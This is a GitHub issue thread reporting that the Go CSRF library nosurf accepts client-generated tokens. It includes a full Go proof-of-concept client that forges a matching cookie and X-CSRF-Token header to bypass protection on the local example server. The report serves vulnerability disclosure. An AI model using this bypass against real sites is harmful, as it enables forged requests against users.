example is insecure about nosurf HOT 4 CLOSED

On Thu, Aug 31, 2017 at 6:20 PM jolan ***@***.***> wrote: This may be a bit silly since I don't think it is intended usage, but I find it kind of odd that by default nosurf doesn't actually verify that the CSRF token is generated by the server, just that it is valid so it is relatively easy to bypass. Anyway, the example code says... <!-- Try removing this or changing its value and see what happens --> OK challenge accepted: ==> GET ignoring csrf token prnkNlDJPKrNQztxLZ41TnTV9ILVRhpbfTatqo/qbF0= -- posting with cookie MDEyMzQ1Njc4OTAxMjM0NTY3ODkwMTIzNDU2Nzg5MDE= X-CSRF-TOKEN header guBSEnDYkGLIhRVVJKnMdUfrx57ipBW2YhecPtC1ni+y0WAhRO2mVfC8JWQWmvhAcdz/p9KVJ4VWIqoJ6IyuHg== instead ==> POST response: http status code 200 So I am able to bypass the CSRF protection by just generating my own token. Again, I realize maybe this is possibly a silly scenario but I was challenged to break the example code and I did. Client code follows: package main import ( "bytes" "crypto/rand" "encoding/base64" "fmt" "io" "net/http" "net/url" "strings" "time" ) const ( tokenLength = 32 ) func main() { client := &http.Client{} selfTokenBytes := []byte("01234567890123456789012345678901") selfCookieToken := b64encode(selfTokenBytes) selfHeaderToken := b64encode(maskToken(selfTokenBytes)) r := bytes.NewReader([]byte("")) fmt.Printf("==> GET\n") req, err := http.NewRequest("GET", "http://127.0.0.1:8000", r) resp, err := client.Do(req) if err != nil { fmt.Printf("err: %v\n", err) return } s := strings.Split(resp.Header["Set-Cookie"][0], ";") ss := strings.SplitN(s[0], "=", 2) fmt.Printf("ignoring csrf token %v -- posting with cookie %v X-CSRF-TOKEN "+ "header %v instead\n", ss[1], selfCookieToken, selfHeaderToken) fmt.Printf("==> POST\n") form := url.Values{} form.Add("name", "jolan") // lift csrf cookie req2, err := http.NewRequest("POST", "http://127.0.0.1:8000", strings.NewReader(form.Encode())) req2.Header.Add("X-CSRF-Token", selfHeaderToken) expiration := time.Now().Add(365 * 24 * time.Hour) cookie := http.Cookie{Name: "csrf_token", Value: selfCookieToken, Expires: expiration} req2.AddCookie(&cookie) //spew.Dump(req2.Header) resp2, err := client.Do(req2) if err != nil { fmt.Printf("err: %v\n", err) return } fmt.Printf("response: http status code %v\n", resp2.StatusCode) } func b64encode(data []byte) string { return base64.StdEncoding.EncodeToString(data) } // Masks/unmasks the given data *in place*// with the given key// Slices must be of the same length, or oneTimePad will panicfunc oneTimePad(data, key []byte) { n := len(data) if n != len(key) { panic("Lengths of slices are not equal") } for i := 0; i < n; i++ { data[i] ^= key[i] } } func maskToken(data []byte) []byte { if len(data) != tokenLength { fmt.Printf("%v != %v\n", len(data), tokenLength) panic("data != tokenLength") } // tokenLength*2 == len(enckey + token) result := make([]byte, 2*tokenLength) // the first half of the result is the OTP // the second half is the masked token itself key := result[:tokenLength] token := result[tokenLength:] copy(token, data) // generate the random token if _, err := io.ReadFull(rand.Reader, key); err != nil { panic(err) } oneTimePad(token, key) return result } — You are receiving this because you are subscribed to this thread. Reply to this email directly, view it on GitHub <#44>, or mute the thread <https://github.com/notifications/unsubscribe-auth/AABIcI6kDhpzZnDu4rrDhVMT2FroRAVyks5sdzGXgaJpZM4PJew-> .